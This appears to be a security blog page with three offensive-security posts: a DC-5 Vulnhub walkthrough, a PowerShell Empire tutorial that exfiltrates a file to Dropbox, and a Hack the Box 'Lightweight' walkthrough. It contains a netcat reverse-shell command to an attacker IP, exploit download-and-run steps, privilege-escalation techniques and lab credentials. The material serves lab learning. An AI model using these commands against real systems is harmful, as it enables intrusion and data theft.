DC-5 Vulnhub Walkthrough

at 9:39 AM Saturday, June 1, 2019 0 comments

Today we are going to take another boot2root challenge known as “DC-5”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.
Security Level: Beginner

Penetrating Methodology

Scanning
  • Discovering Targets IP
  • Network scanning (Nmap)
Enumeration
  • Surfing HTTP service port
  • Abusing CMS using LFI to get /etc/passwd
  • Checking Ngnix Access Logs
Exploiting
  • Exploiting LFI vulnerability using Burpsuite
  • Using Netcat to get the reverse shell
  • Spawning a tty shell
Privilege Escalation
  • Checking SUID binaries
  • Kernel privilege Escalation
  • Accessing root directory
  • Capture the flag

Walkthrough

Scanning

Let’s start off with scanning the network to find our target.
netdiscover



We found our Targets IP Address 192.168.1.108. Our next step is to scan our targets IP Address with nmap.
nmap -A 192.168.1.108



Enumeration
From nmap result we found HTTP service is running on port 80. So, we browsed the Targets IP Address in the browser.  Let’s explore the webpage for hints.



While exploring the page, we found a contact form which seems interesting. We filled the form and submitted it.



After submitting the form, we notice the Copyright says 2019.



On refreshing the page multiple times, we notice changes in Copyright year i.e 2020 AND 2019 where it was called on thankyou.php file.




Quickly checking for LFI Vulnerability to obtain the /etc/passwd file.



After going through various files path, we found nginx access log file.



Let’s capture the request of the Nginx Access log file using Burpsuite. Here we will be using LFI to exploit apache access log.



Exploiting LFI
In place of the file path, we have injected a Code to get the command line access by making a GET request to the Server.



To verify that it is working or not, we have added a new parameter to the URL i.e &cmd=id. Therefore from the output, it confirms we have successfully executed the command on the server.

Privilege Escalation

Using netcat shell with cmd. This will give us a reverse shell over our netcat listener which we have executed alongside.
nc -e /bin/bash 192.168.1.110 1234



Booyeah!! We have got the reverse shell. To get the proper shell, we have Spawn the Python TTY Shell. Without wasting much time, I looked for SUID enabled binaries and here /bin/screen-4.5.0 looks interesting.
nc -lvp 1234



Privilege Escalation
It quickly strikes us to look for this term screen-4.5.0 using searchsploit. And what we got was a LOCAL PRIVILEGE ESCALATION Exploit. We have copied the exploit on our system.
searchsploit screen 4.5.0
searchsploit -m 41154



When we didn’t find any appropriate method to execute this shell script for post exploitation then I go with manual compilation and review its code using cat command.
cat  41154.sh

If you will notice the following code then you will observe this script is written in C language and we have divided it into three part for manual compilation.
  • Copy Yellow highlighted the code and past it in a text document and save it as libhax.c
  • Copy Orange highlighted the code and past it in a text document and save it as rootshell.c
At last copy remaining code and past it in a text document and save it as 41154.sh



From given below image you can see I have pasted above copied code inside rootshell.c



From given below image you can see I have pasted above copied inside libhax.c



From given below image you can see I have pasted above remaining copied inside 41154.sh and save all three text document inside the /etc directory on our system.



Let’s compile our C program file manually in our local system using gcc. Similarly compile rootshell.c file.
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
Since we have stored all the files in a folder shell, now let’s upload them into the target’s system using python server.
python -m SimpleHTTPServer



Let’s just downloading all the files inside the /tmp folder of the previous reverse shell.
wget http://192.168.1.110:8000/41154.sh
wget http://192.168.1.110:8000/libhax.so
wget http://192.168.1.110:8000/rootshell



After making the file executable and running, we have got the root access. One final thing to do is to read our FINAL FLAG.
chmod 777 41154.sh
./41154.sh
id
cd /root
ls
cat thisistheflag.txt


Labels:

Data Exfiltration using PowerShell Empire

at 11:49 AM Monday, May 27, 2019 0 comments

In our previous post, we had already discussed “Command and Control with DropboxC2 But we are going to demonstrate Data Exfiltration by using PowerShell Empire where we will extract the unauthorized data inside our Dropbox account. Here you will learn how an intruder can exfiltrate data over a cloud storage.
What is Data Exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.


Methods of Data exfiltration
Open Methods:
·         HTTP/HTTPS Downloads & Uploads
·         FTP
·         Email
·         Instant Messaging
·         P2P filesharing
Concealed Methods:
·         SSH
·         VPN
·         Protocol Tunneling
·         Cloud Storage Uploads
·         Steganography
·         Timing channel
(From Wikipedia)
Generate Token Via Dropbox API
In order to do that, this tool requires a Dropbox API. To get that, first, create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section, we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.



This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and
Generate access token. This will give the Dropbox API required for this particular practical; now copy the generated token.



Data Exfiltration
Now we are going to use Powershell empire for exfiltration, considering we have already compromised the victim machine and we are about to complete our mission by copying data from inside the victim without his knowledge.
As you can observe we have Empire-agent which means I have already spawned shell of victim’s machine and Empire has post exploit for data exfiltration.
usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\Users\raj\Desktop\notes.txt
set TargetFilePath /Apps/notes.txt
set ApiKey
execute



As you can observe that I have notes.txt inside /my files which means we have successfully transferred the data from source location to destination.



Thus, in this way we have successfully transfer the data from victim’s machine to our dropbox and hence this technique is known as dropbox exfiltration.

Labels:

Lightweight: Hack the Box Walkthrough

at 6:40 AM Sunday, May 26, 2019 0 comments

Today we are going to solve another CTF challenge “lightweight”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of lightweight is 10.10.10.119
Penetration Methodologies
Scanning
·         Network Scanning (Nmap)
Enumeration
·         Ldap database Enumerate (Nmap NSE-script)
·         HTTP surfing
Exploiting
·         Connect to SSH
·         Identify capability folder
·         Sniffing password via tcpdump
·         Obtain user.txt
Privilege Escalation
·         Extracting backup.7z
·         Identify another user’s credential
·         Exploit openssl capability
·         Obtain root.xt

Walkthrough
Scanning
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -A 10.10.10.119
As you can observe that it has shown port 389 is open for ldap services and 22 & 80 are available for ssh and http respectively.

Enumeration
Therefore, with help of nmap NSE script we go for ldap enumeration:
nmap -Pn -p 389 –script ldap-search 10.10.10.119


Luckily! Nmap listed two ldapuser1, ldapuser2 usernames along with a hash of their password from the result of nmap scan, yet we did not crack them.


Since we know that http service was running on port 80 therefore, we navigate to web browser and browse target IP and welcome by following page where we saw “This site is protected by against bruteforging ” that mean fail2ban could be running inside VM moreover we found three hyperlinks.


When I opened the user.php hyperlinke I read the highlighted text and according to this text a user in the machine has been automatically added for us.


Exploiting
Therefore, I try to connect with SSH by using 10.10.14.10:10.10.14.10 as login credential. At this point, I was not sure what should be done to extract hidden flasg therefore I thought to identify the binary capability files with the help of getcap and saw fruitful result.
ssh 10.10.14.10@10.10.10.119
getcap -r / 2>/dev/null


As we have seen in the above image that tcpdump has the capabilities to capture all network traffic even in a low-privileged access, therefore I trigger the following command to inspect ldap connection traffic if possible.
tcpdump -i any -X port ldap
And then navigate to the browser to activate authentication via status.php, since the loading takes time. There's something behind the action has to be happen.
As result we observe the following traffic, as predicted, where I found ldapuser2 password in plaintext.


Then we switch the user with following credential and obtain our first flag user.txt
Username: ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2


Privilege Escalation
Inside the directory /ldapuser2, I found an archive as backup.7z and for its inspection we need to transfer this file my in our local machine.
cat backuo.7z |base64

So, I copied it in our machine and try to extract the file, but it was password protected.


Then, by using an online link "lostmyoass.com," I try to break the password key and then find out the cracked password: delete as in the image below.



And use the "delete" password to extract the directory. I found some php files here and we looked for a status.php file among those files.

The status.php file reveals the password of ldapuser1 as shown in the image.



Thus, we switched to ldapuser1 and navigate inside the directory of ldapuser1
su ldapuser1
password: f3ca9d298a553da117442deeb6fa932d


This time once again I checked for file capacity where I saw openssl has all privileges to read a file that owned root user and therefore we decided to grab root.txt directly through openssl.
getcap -r / 2>/dev/null
./openssl base64 -a -in /root/root.txt | base64 -d

Labels:
Subscribe to: Posts (Atom)